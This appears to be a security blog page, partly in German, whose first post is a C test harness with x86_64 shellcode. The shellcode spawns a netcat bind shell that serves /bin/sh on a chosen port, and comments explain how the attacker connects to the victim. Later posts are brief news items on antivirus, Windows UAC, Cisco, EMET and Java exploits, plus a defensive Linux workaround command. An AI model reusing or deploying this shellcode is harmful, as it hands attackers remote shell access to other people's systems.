Jul 16 06
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdio.h>
#include <string.h>
 
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
 
unsigned char code[] = \
 
#define PORT "\x39\x39"
// Keep to two bytes
 
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
 
int main ()
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %d Bytes Long\n", strlen(code));
 
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
 
	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call code");
	return 0;
}

written by d45id \\ tags: , , , ,

Sep 15 25

After a successfull exploit on ESET’s antivirus scanner NOD32 and Kaspersky’s engine now googles security expert taviso has found a new critical bug in avast! antivirus scanner with which a system call could be done.
AvastUI-load-calc

 

Now everybody wonders who will be the next, Trend Micro, Intel (formerly known as McAfee) or somebody else ?

written by d45id \\ tags: , , , , , , ,

Mrz 15 23

A research by Mordechai Guri and Prof. Yuval Elovici from the Cyber Security Resarch Center at Ben-Gurion University found a new way for jumping the Air-Gap.

This time they are doing this by using the heat emissions and a computer’s built-in thermal sensors.

See also

written by d45id \\ tags: , , , , ,

Jan 15 02

ms-windowsIn Microsoft Windows klafft erneut eine Sicherheitslücke (MSRC-20544), diesmal in der ahcache.sys, die zu einer Umgehung der User Account Control (UAC) ausgenutz werden kann um die eigenen Benutzerrechte zu erweitern.

Sicherheitsforscher von google sind über diese Schwachstelle schon Ende September 2014 gestollpert, da Microsoft bis heute nicht wirklich darauf reagierte wurden nun Einzelheiten, sowie ein Proof of Concept (PoC) veröffentlicht. Das PoC demonstiert die Schwachstelle in Windows 8.1 (32bit sowie 64bit) und startet den Windows calculator aus einem einfachen Benutzerkontext heraus als Administrator.

Ausführliche Informationen sowie das PoC finden sich hier

written by d45id \\ tags: , , , , , ,

Nov 14 11

SpaceInvadersCisco Catalyst switching devices did not properly parse the „request system shell“ challenge response, which allows local users to obtain Linux root access by leveraging administrative privilege (see also CVE-2014-7990). Harrison Shlong use this to add the new Space Invaders feature to Catalyst switches

written by d45id \\ tags: , , , , ,

Feb 14 25

ms-windows„Researchers at Bromium Labs are expected to announce today they have developed an exploit that bypasses all of the mitigations in Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). Principal security researcher Jared DeMott is delivered a presentation at the Security BSides conference explaining how the company’s researchers were able to bypass all of the memory protections offered within the free Windows toolkit. The work is significant given that Microsoft has been quick to urge customers to install and run EMET as a temporary mitigation against zero-day exploits targeting memory vulnerabilities in Windows or Internet Explorer. The exploit bypasses all of EMET’s mitigations, unlike previous bypasses that were able to beat only certain aspects of the tool. Researchers took a real-world IE exploit and tweaked it until they had a complete bypass of EMET’s ROP, heap spray, SEHOP, ASLR, and DEP mitigations.“

written by d45id \\ tags: , , , , ,

Jan 13 11

Und es ist einmal wieder so weit, eine neues Java zero-day-exploit macht die Runde. Eine ausführliche (technische) Beschreibung, sowie das Exploit selbst findet ihr auf der Webseite von @Kafeine.

Das schöne an dieser Lücke ist, dass sie alle Versionen von Java 7 – eingeschlossen Java 7 Update 10 – betrifft und es keinen wirksamen Schutz gegen sie gibt. Daher deaktiviert deinstalliert Java komplett oder deaktivert es zumindest in eurem Browser! Wie das geht:

Achja, seit Java 7 Update 10 besteht auch die Möglichkeit über das  Java Control Panel Java für die Webbrowser global zu deaktiveren.

written by d45id \\ tags: , , , , ,

Sep 10 17

In meinem vergangen  Artikel berichtete ich bereits über eine wieder aufgetretene Schwachstelle im x86_64bit LINUX-Kernel, nun möchte ich euch für dieses kleine Problem einen funktionsfähigen Workaround präsentieren.

Der Workaround besteht darinnen das Ausführen von 32bit Binärdateien auf x86_64bit LINUX Systemen auszuschalten. Dies geschieht wie folgt:

echo ':32bits:M:0:\x7fELF\x01::/bin/echo:' > /proc/sys/fs/binfmt_misc/register

Dies bewirkt, dass nun nur noch ein /bin/echo filename ausgeführt wird, anstatt eine 32bit ELF Binärdatei auszuführen.

Wohl bemerkt, dies hilft euch nur, wenn ihr auf 32bit Programme nicht angewiesen seit.

written by d45id \\ tags: , , , , ,